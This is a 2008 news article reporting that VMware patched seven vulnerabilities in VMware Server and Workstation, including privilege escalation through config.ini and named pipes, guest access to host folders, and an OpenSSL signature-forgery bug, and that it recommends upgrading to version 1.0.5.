VMware Solves Several Problems in its Hypervisor Application

VMware, the market leader in virtualized servers, has detected and patched seven vulnerabilities in its freely available edition of hypervisor, which on exploiting could allow hackers to launch DoS (Denial of Service) attacks, modify user privileges and counterfeit RSA key signatures, according to officials of VMware.

A DoS attack refers to an attack against a target computer or network to prevent it from allowing authorized and legitimate users to access resources.

VMware detected the issues in VMware Server, the firm's free software for server virtualization, followed by finding fixes for them within the newly released edition 1.0.5. According to an advisory from Secunia, VMware first announced the problems on March 17, 2008 and Secunia classified the flaws as "less critical."

According to a posting on VMware's Website, the company after conducting a security audit found an object that was insecurely created and capable of malicious exploitation to raise user privileges.

The security audit also found that an attacker could exploit and gain privileges from local systems by causing an authorized mechanism to link to a selected pipe that is maliciously controlled and opened. In such a situation, the attacker could successfully mimic an authorized user and gain the system's privileges.

The vendor further found that VMware Workstation, which allows multiple operating software to run simultaneously on the same computer, contained vulnerability. While the Workstation runs on Windows operating system, the vulnerability allows a guest system accesses the host's folders including creating and changing executable files located in sensitive regions.

Moreover, another VMware update that described the ability of the legitimate process to read and accept the vmx.fullpath variable within config.ini, a user-writable file, allowed the process to create the security vulnerability. The config.ini file could even undergo modification by a non-administrator to alter the VMX launch path. Such an act would create vulnerability, which could allow user privilege escalation.

As accords to VMware officials, the particular bug that enabled users to create counterfeit RSA key signatures received a solution with an upgraded VMware Server to a new OpenSSL version. However, for all the bugs, VMware recommends users to upgrade to version 1.0.5.

» SPAMfighter News - 3/25/2008